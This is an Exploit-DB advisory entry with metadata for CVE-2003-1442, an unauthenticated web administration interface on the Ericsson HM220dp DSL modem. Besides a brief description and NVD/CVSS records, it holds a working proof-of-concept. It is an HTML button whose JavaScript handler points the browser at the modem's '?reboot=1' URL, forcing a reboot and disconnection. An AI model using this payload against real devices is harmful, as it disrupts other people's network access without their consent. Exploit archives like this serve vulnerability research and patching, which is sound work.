Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability
2003-02-11T00:00:00
ID EDB-ID:22244 Type exploitdb Reporter Davide Del Vecchio Modified 2003-02-11T00:00:00
Description
Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability. CVE-2003-1442 . Remote exploit for hardware platform
source: http://www.securityfocus.com/bid/6824/info
The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement.
[script]
function exploit(){
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
}
[/script]
[input type="button" value="disconnect" onClick="exploit();"]
{"id": "EDB-ID:22244", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability", "description": "Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability. CVE-2003-1442 . Remote exploit for hardware platform", "published": "2003-02-11T00:00:00", "modified": "2003-02-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/22244/", "reporter": "Davide Del Vecchio", "references": [], "cvelist": ["CVE-2003-1442"], "lastseen": "2016-02-02T18:18:11", "viewCount": 7, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-02-02T18:18:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-1442"]}], "modified": "2016-02-02T18:18:11", "rev": 2}, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/22244/", "sourceData": "source: http://www.securityfocus.com/bid/6824/info\r\n\r\nThe Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement. \r\n\r\n[script]\r\nfunction exploit(){\r\nwindow.location = \"view-source:http://www.example.com/dummy.html?reboot=1\";\r\n}\r\n[/script]\r\n[input type=\"button\" value=\"disconnect\" onClick=\"exploit();\"]\r\n\r\n", "osvdbidlist": ["59601"]}
{"cve": [{"lastseen": "2021-02-02T05:22:10", "description": "The web administration page for the Ericsson HM220dp ADSL modem does not require authentication, which could allow remote attackers to gain access from the LAN side.", "edition": 4, "cvss3": {}, "published": "2003-12-31T05:00:00", "title": "CVE-2003-1442", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2003-1442"], "modified": "2017-07-29T01:29:00", "cpe": ["cpe:/h:ericsson:hm220dp_adsl_modem:*"], "id": "CVE-2003-1442", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1442", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:h:ericsson:hm220dp_adsl_modem:*:*:*:*:*:*:*:*"]}]}
